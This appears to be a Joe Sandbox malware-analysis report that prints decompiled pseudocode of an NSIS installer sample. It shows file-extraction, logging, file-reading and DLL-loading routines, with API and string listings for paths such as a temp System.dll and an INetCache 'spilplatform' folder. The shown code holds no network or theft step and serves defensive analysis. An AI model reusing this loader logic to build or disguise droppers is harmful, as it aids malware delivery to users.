				_t35 = E00405B94( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t84 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405B1D(E0040624C(_t84, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth")), ??);
				} else {
					E0040624C();
				}
				E004064E0(_t84);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040658F(_t84);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405D19(_t84);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405D3E(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x30) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004052B0(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2a8;
						goto L32;
					} else {
						E0040624C("C:\Users\Arthur\AppData\Local\Temp\nseEF5D.tmp", _t81);
						E0040624C(_t81, _t84);
						E0040626E(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nseEF5D.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
						E0040624C(_t81, "C:\Users\Arthur\AppData\Local\Temp\nseEF5D.tmp");
						_t64 = E004058AE("C:\Users\Arthur\AppData\Local\Temp\nseEF5D.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2a8 =  &( *0x42a2a8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t84);
								_push(0xfffffffa);
								E004052B0();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004052B0(0xffffffea,  *(_t86 - 8)); // executed
				 *0x42a2d4 =  *0x42a2d4 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 0x30));
				_push( *((intOrPtr*)(_t86 - 0x20)));
				_t45 = E004030FA(); // executed
				 *0x42a2d4 =  *0x42a2d4 - 1;
				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
				_t82 = _t45;
				if( *(_t86 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x30)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E0040626E(_t77, _t82, _t84, _t84, 0xffffffee);
					} else {
						E0040626E(_t77, _t82, _t84, _t84, 0xffffffe9);
						lstrcatW(_t84,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t84);
					E004058AE();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x00402885
0x00402885
0x00402abf
0x00402ac2
0x00402ac2
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402ac8
0x00402ac8
0x00402ac8
0x00401867
0x00401867
0x00401868
0x00401493
0x004022f1
0x004022f1
0x004022f1
0x00401865
0x0040185e
0x00402aca
0x00402ace
0x00402ace
0x00401892
0x00401897
0x0040189d
0x0040189e
0x0040189f
0x004018a2
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x004022ec
0x00000000
0x004022ec
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth,?,?,00000031), ref: 004017D5

Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259

Part of subcall function 004052B0: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
Part of subcall function 004052B0: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,00403233), ref: 0040530B
Part of subcall function 004052B0: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll), ref: 0040531D
Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B

Strings

C:\Users\user\AppData\Local\Temp\nseEF5D.tmp, xrefs: 00401821, 0040183F
Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll, xrefs: 00401835, 00401851
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth, xrefs: 0040179E

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$C:\Users\user\AppData\Local\Temp\nseEF5D.tmp$C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll$Call
API String ID: 1941528284-3020842413
Opcode ID: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
Instruction ID: a770c97b6a534c03b62b220807ae8b4c56d0338f794e1485d955ae8f7948b73c
Opcode Fuzzy Hash: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
Instruction Fuzzy Hash: 69419331900519BECF117BB5CD45DAF3A79EF45329B20827FF412B11E2CA3C8A619A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004052B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004052B0(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x4291e4;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a2d4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040626E(_t38, 0, 0x4226c8, 0x4226c8, _a4);
					}
					_t27 = lstrlenW(0x4226c8);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x4291c8, 0x4226c8); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x4226c8;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x4226c8[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x4226c8, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004052b6
0x004052c0
0x004052c5
0x004052cb
0x004052d6
0x004052d9
0x004052dc
0x004052e2
0x004052e2
0x004052e8
0x004052f0
0x004052f3
0x00405310
0x00405314
0x0040531d
0x0040531d
0x00405327
0x00405330
0x0040533c
0x00405343
0x00405347
0x0040534a
0x0040535d
0x0040536b
0x0040536b
0x0040536f
0x00405371
0x00405374
0x00000000
0x00405374
0x004052f5
0x004052fd
0x00405305
0x0040530b
0x00000000
0x0040530b
0x00405305
0x004052f3
0x00405380

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
lstrlenW.KERNEL32(00403233,Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,00403233), ref: 0040530B
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll), ref: 0040531D
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll, xrefs: 004052D1, 004052E1, 004052E7, 0040530A, 00405316

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll
API String ID: 2531174081-3258401854
Opcode ID: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
Instruction ID: a4acd4142143b7f1d9b449385db23515f6e2bed73a3e7c1e364118513a645948
Opcode Fuzzy Hash: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
Instruction Fuzzy Hash: 09216071900518BACB21AF66DD84DDFBF74EF45350F14807AF944B62A0C7794A51CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00402644(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
				_t66 = E00402C15(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t72;
				 *((intOrPtr*)(_t76 - 0x3c)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x3c) = 0x3ff;
					}
					if( *__esi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x30) = __ebx;
						 *(__ebp - 0x10) = E004061AC(__ecx, __esi);
						if( *(__ebp - 0x3c) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405E1F( *(__ebp - 0x10), __ebx) >= 0) {
										__eax = __ebp - 0x44;
										if(E00405DC1( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x38;
									_push(__ebx);
									_push(__ebp - 0x38);
									__eax = 2;
									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x38);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x48) = __ecx;
											 *(__ebp - 0x44) = __eax;
											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406193( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x44 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x44);
												} else {
													__esi =  *(__ebp - 0x48);
													__esi =  ~( *(__ebp - 0x48));
													while(1) {
														_t22 = __ebp - 0x38;
														 *_t22 =  *(__ebp - 0x38) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x44) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
														__esi = __esi + 1;
														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, 1); // executed
														__ebp - 0x44 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x44, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x30) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x3c));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x00402644
0x00402646
0x00402649
0x0040264b
0x0040264e
0x00402653
0x00402657
0x0040265a
0x0040265d
0x00402abf
0x00402ac2
0x00402663
0x00402663
0x0040266a
0x0040266c
0x0040266c
0x00402672
0x004027d6
0x004027d6
0x004027d9
0x004027de
0x004015b6
0x00402885
0x00402885
0x00000000
0x00402678
0x00402679
0x00402684
0x00402687
0x00402693
0x00402697
0x0040272f
0x00402747
0x00402757
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040269d
0x0040269d
0x004026a0
0x004026a1
0x004026a4
0x004026a9
0x004026b0
0x004026b8
0x00000000
0x004026be
0x004026be
0x004026c3
0x00000000
0x004026c9
0x004026c9
0x004026d1
0x004026d4
0x004026d7
0x00402792
0x00402799
0x004026dd
0x004026e3
0x004026ef
0x00402759
0x00402759
0x004026f1
0x004026f1
0x004026f4
0x004026f6
0x004026f6
0x004026f6
0x004026f9
0x004026fe
0x00402701
0x00000000
0x00000000
0x00402703
0x00402706
0x0040270e
0x0040271a
0x00402728
0x00000000
0x0040272a
0x00000000
0x0040272a
0x00000000
0x00402728
0x004026f6
0x0040275c
0x0040275f
0x00000000
0x00402761
0x00402766
0x004027a7
0x004027c9
0x004027d0
0x004027b5
0x004027b5
0x004027b8
0x004027bb
0x004027be
0x004027be
0x00000000
0x0040276f
0x0040276f
0x00402772
0x00402775
0x0040277b
0x0040277f
0x00402782
0x00000000
0x00000000
0x00000000
0x00000000
0x00402782
0x00402766
0x0040275f
0x004026d7
0x004026c3
0x004026b8
0x00000000
0x00402784
0x00402784
0x00402787
0x00402790
0x00000000
0x00402687
0x00402672
0x00402ac8
0x00402ace

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724

Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E35

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0

Strings

9, xrefs: 00402693

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
Instruction ID: e157cda522c6117da55a2477cd969df60feaafed97a1adf3b1f02a042ae2ebc2
Opcode Fuzzy Hash: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
Instruction Fuzzy Hash: 9C51F774D10219ABDF20DFA5DA88AAEB779FF04304F50443BE511B72D1D7B89982CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004065B6 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004065B6(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004065cd
0x004065d6
0x004065d8
0x004065d8
0x004065dc
0x004065ef
0x004065e9
0x004065e9
0x004065e9
0x00406608
0x0040661c
0x00406623

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
wsprintfW.USER32 ref: 00406608
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C

Strings

UXTHEME, xrefs: 004065BF
%s%S.dll, xrefs: 00406602
\, xrefs: 004065DE

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction ID: f2f916ca2f11fba704df1b43a3ace0cea71321b702594bff0db05fa861777559
Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction Fuzzy Hash: F9F0F670500219BBCF24AB68ED0DF9B3B6CAB00704F50447AA646F10D1EB78DA24CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E004030FA(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				short _v148;
				void* _t59;
				intOrPtr _t69;
				long _t70;
				void* _t71;
				intOrPtr _t81;
				intOrPtr _t86;
				long _t89;
				signed int _t90;
				int _t91;
				int _t92;
				intOrPtr _t93;
				void* _t94;
				void* _t95;

				_t90 = _a16;
				_t86 = _a12;
				_v12 = _t90;
				if(_t86 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t81 = _t86;
				if(_t86 == 0) {
					_t81 = 0x410ea0;
				}
				_t56 = _a4;
				if(_a4 >= 0) {
					E004032F5( *0x42a278 + _t56);
				}
				if(E004032DF( &_a16, 4) == 0) {
					L33:
					_push(0xfffffffd);
					goto L34;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t86 == 0) {
							while(_a16 > 0) {
								_t91 = _v12;
								if(_a16 < _t91) {
									_t91 = _a16;
								}
								if(E004032DF(0x40cea0, _t91) == 0) {
									goto L33;
								} else {
									if(E00405DF0(_a8, 0x40cea0, _t91) == 0) {
										L28:
										_push(0xfffffffe);
										L34:
										_pop(_t59);
										return _t59;
									}
									_v8 = _v8 + _t91;
									_a16 = _a16 - _t91;
									continue;
								}
							}
							L43:
							return _v8;
						}
						if(_a16 < _t90) {
							_t90 = _a16;
						}
						if(E004032DF(_t86, _t90) != 0) {
							_v8 = _t90;
							goto L43;
						} else {
							goto L33;
						}
					}
					_v16 = GetTickCount();
					E00406787(0x40ce10);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L43;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t92 = 0x4000;
						if(_a16 < 0x4000) {
							_t92 = _a16;
						}
						if(E004032DF(0x40cea0, _t92) == 0) {
